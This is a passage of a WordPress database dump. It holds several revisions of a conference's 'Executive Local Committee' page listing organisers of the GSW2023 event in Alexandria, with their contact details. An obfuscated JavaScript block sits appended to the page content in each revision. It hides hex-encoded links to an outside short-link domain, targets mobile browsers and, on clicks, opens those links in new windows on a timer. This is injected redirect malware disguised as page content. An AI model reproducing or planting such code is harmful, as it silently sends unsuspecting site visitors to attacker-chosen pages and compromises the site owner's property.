Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-29 16:22:25','2023-06-29 16:22:25','',4849,'https://gsw2023.com/?p=4964',0,'revision','',0),
(4965,4,'2023-06-29 20:12:00','2023-06-29 20:12:00','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688069499076{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Security Engineer</span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-29 20:12:00','2023-06-29 20:12:00','',4849,'https://gsw2023.com/?p=4965',0,'revision','',0),
(4966,4,'2023-06-29 20:12:09','2023-06-29 20:12:09','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" 